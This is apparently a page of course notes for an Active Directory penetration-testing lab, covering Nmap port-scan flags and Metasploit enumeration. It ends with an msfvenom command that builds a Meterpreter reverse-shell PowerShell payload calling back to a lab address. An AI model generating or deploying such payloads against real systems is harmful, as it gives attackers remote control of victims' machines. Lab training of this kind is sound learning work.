Linux AD Lab
Home
  • 💕Altered Security
  • Course Content
  • Port Scanning
    • List of Tools
    • Hands-on 1
  • 4️⃣Meta sploit
    • Page 10
    • Hands-On 2
  • 5️⃣Domain Enumeration
    • AD Module and PowerView
    • Hand-On 3
  • 6️⃣Lateral-Movement - Extracting Credential
    • 🔥Credentials
    • Hans-On 4
  • 7️⃣Lateral-Movement - Credential Spraying
    • Spraying Attack
    • Hands-On 5
  • 8️⃣Lateral-Movement - PS Remoting
    • Live of the Land
    • Hands-On 6
  • Application Whitelisting
    • AWL Bypass
    • Hand-On 7
  • Abusing-SQL Servers
    • Page 4
  • ACL Attacks
    • Page 5
  • Domain Privilege Escalation
    • Page 6
  • Domain Dominance
    • Page 7
  • Detection And Defense
    • Page 8
  • Data
    • COLA-FILESRV
    • COLA-SRV2
    • COLA-SAFE
Powered by GitBook
On this page

Was this helpful?

  1. Port Scanning

Hands-on 1

Use Nmap to identify live machines in the local network. Enumerate open TCP ports on them and the operating system in use.

There are many interesting Nmap flags which can be used:

-sT for full connect TCP scan

-sS for half connect TCP scan

-sU for UDP scan

-sV for service detection

-O for operating system detection

-sC for default scripts to check for vulnerabilities.

// Some code

Use Metasploit to enumerate open shares on any of the live machines in the local network.

show auxiliary
show exploits
show payloads
// Some code

Check if we have write permissions on any share.

// Some code

Generate Payload

msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1
PreviousList of ToolsNextPage 10

Last updated 1 year ago

Was this helpful?